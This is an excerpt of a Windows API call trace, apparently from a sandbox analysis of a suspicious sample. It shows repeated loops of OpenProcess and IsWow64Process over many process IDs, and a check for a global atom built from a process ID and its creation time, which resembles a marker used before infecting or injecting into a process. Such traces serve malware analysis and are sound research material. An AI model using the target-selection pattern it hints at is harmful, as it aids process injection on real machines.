	[0112.659] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.659] CloseHandle (hObject=0x690) returned 1
	[0112.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0112.659] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.659] CloseHandle (hObject=0x690) returned 1
	[0112.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0112.659] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.659] CloseHandle (hObject=0x690) returned 1
	[0112.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0112.659] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.659] CloseHandle (hObject=0x690) returned 1
	[0112.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0112.659] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.659] CloseHandle (hObject=0x690) returned 1
	[0112.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0112.660] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.660] CloseHandle (hObject=0x690) returned 1
	[0112.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0112.660] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.660] CloseHandle (hObject=0x690) returned 1
	[0112.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0112.660] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.660] CloseHandle (hObject=0x690) returned 1
	[0112.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0112.660] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.660] CloseHandle (hObject=0x690) returned 1
	[0112.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0112.660] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.660] CloseHandle (hObject=0x690) returned 1
	[0112.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0112.661] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.661] CloseHandle (hObject=0x690) returned 1
	[0112.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0112.661] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.661] CloseHandle (hObject=0x690) returned 1
	[0112.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0112.661] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.661] CloseHandle (hObject=0x690) returned 1
	[0112.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0112.661] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.661] CloseHandle (hObject=0x690) returned 1
	[0112.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0112.662] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.662] CloseHandle (hObject=0x690) returned 1
	[0112.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0112.662] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.662] CloseHandle (hObject=0x690) returned 1
	[0112.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0112.662] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.662] CloseHandle (hObject=0x690) returned 1
	[0112.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0112.662] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.662] CloseHandle (hObject=0x690) returned 1
	[0112.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0112.662] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.662] CloseHandle (hObject=0x690) returned 1
	[0112.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0112.663] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.663] CloseHandle (hObject=0x690) returned 1
	[0112.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0112.663] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.663] CloseHandle (hObject=0x690) returned 1
	[0112.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0112.663] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.663] CloseHandle (hObject=0x690) returned 1
	[0112.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0112.664] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.664] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0112.664] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0112.664] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0112.664] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.665] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0112.681] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.681] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0112.681] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0112.681] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0112.681] CloseHandle (hObject=0x690) returned 1
	[0112.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0112.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0112.682] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.682] CloseHandle (hObject=0x690) returned 1
	[0112.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0112.682] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.682] CloseHandle (hObject=0x690) returned 1
	[0112.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0112.682] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.682] CloseHandle (hObject=0x690) returned 1
	[0112.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0112.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0112.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0112.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0112.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0112.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0112.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0112.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0112.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0112.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0112.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0112.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0112.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0112.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0112.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0112.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0112.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0112.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0112.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0112.877] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.877] CloseHandle (hObject=0x690) returned 1
	[0112.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0112.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0112.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0112.878] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.878] CloseHandle (hObject=0x690) returned 1
	[0112.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0112.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0112.879] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.879] CloseHandle (hObject=0x690) returned 1
	[0112.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0112.879] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.879] CloseHandle (hObject=0x690) returned 1
	[0112.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0112.879] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.879] CloseHandle (hObject=0x690) returned 1
	[0112.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0112.879] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.879] CloseHandle (hObject=0x690) returned 1
	[0112.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0112.880] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.880] CloseHandle (hObject=0x690) returned 1
	[0112.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0112.880] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.880] CloseHandle (hObject=0x690) returned 1
	[0112.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0112.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0112.880] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.880] CloseHandle (hObject=0x690) returned 1
	[0112.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0112.880] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.880] CloseHandle (hObject=0x690) returned 1
	[0112.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0112.881] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.881] CloseHandle (hObject=0x690) returned 1
	[0112.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0112.881] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.881] CloseHandle (hObject=0x690) returned 1
	[0112.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0112.881] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.881] CloseHandle (hObject=0x690) returned 1
	[0112.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0112.881] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.881] CloseHandle (hObject=0x690) returned 1
	[0112.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0112.882] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.882] CloseHandle (hObject=0x690) returned 1
	[0112.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0112.882] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.882] CloseHandle (hObject=0x690) returned 1
	[0112.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0112.882] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.882] CloseHandle (hObject=0x690) returned 1
	[0112.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0112.882] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.882] CloseHandle (hObject=0x690) returned 1
	[0112.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0112.882] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.882] CloseHandle (hObject=0x690) returned 1
	[0112.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0112.883] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.883] CloseHandle (hObject=0x690) returned 1
	[0112.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0112.883] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.883] CloseHandle (hObject=0x690) returned 1
	[0112.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0112.883] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.883] CloseHandle (hObject=0x690) returned 1
	[0112.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0112.883] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.883] CloseHandle (hObject=0x690) returned 1
	[0112.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0112.883] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.883] CloseHandle (hObject=0x690) returned 1
	[0112.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0112.884] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.884] CloseHandle (hObject=0x690) returned 1
	[0112.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0112.884] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.884] CloseHandle (hObject=0x690) returned 1
	[0112.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0112.884] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.884] CloseHandle (hObject=0x690) returned 1
	[0112.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0112.884] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.884] CloseHandle (hObject=0x690) returned 1
	[0112.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0112.885] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.885] CloseHandle (hObject=0x690) returned 1
	[0112.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0112.885] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.885] CloseHandle (hObject=0x690) returned 1
	[0112.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0112.885] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.885] CloseHandle (hObject=0x690) returned 1
	[0112.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0112.886] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.886] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0112.886] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0112.886] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0112.886] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.887] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0112.887] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.887] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0112.887] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0112.887] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0112.887] CloseHandle (hObject=0x690) returned 1
	[0112.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0112.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0112.887] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.887] CloseHandle (hObject=0x690) returned 1
	[0112.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0112.888] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.888] CloseHandle (hObject=0x690) returned 1
	[0112.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0112.888] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.888] CloseHandle (hObject=0x690) returned 1
	[0112.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0112.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0112.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0112.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0112.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0112.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0112.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0112.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0112.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0112.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0112.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0112.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0112.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0112.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0112.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0112.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0112.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0112.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0112.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0112.942] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.943] CloseHandle (hObject=0x690) returned 1
	[0112.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0112.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0112.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0112.943] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.943] CloseHandle (hObject=0x690) returned 1
	[0112.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0112.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0112.943] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.944] CloseHandle (hObject=0x690) returned 1
	[0112.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0112.944] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.944] CloseHandle (hObject=0x690) returned 1
	[0112.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0112.944] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.944] CloseHandle (hObject=0x690) returned 1
	[0112.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0112.944] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.944] CloseHandle (hObject=0x690) returned 1
	[0112.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0112.944] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.944] CloseHandle (hObject=0x690) returned 1
	[0112.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0112.945] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.945] CloseHandle (hObject=0x690) returned 1
	[0112.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0112.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0112.945] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.945] CloseHandle (hObject=0x690) returned 1
	[0112.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0112.945] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.945] CloseHandle (hObject=0x690) returned 1
	[0112.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0112.945] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.945] CloseHandle (hObject=0x690) returned 1
	[0112.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0112.946] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.946] CloseHandle (hObject=0x690) returned 1
	[0112.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0112.946] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.946] CloseHandle (hObject=0x690) returned 1
	[0112.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0112.946] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.946] CloseHandle (hObject=0x690) returned 1
	[0112.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0112.946] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.946] CloseHandle (hObject=0x690) returned 1
	[0112.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0112.947] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.947] CloseHandle (hObject=0x690) returned 1
	[0112.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0112.947] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
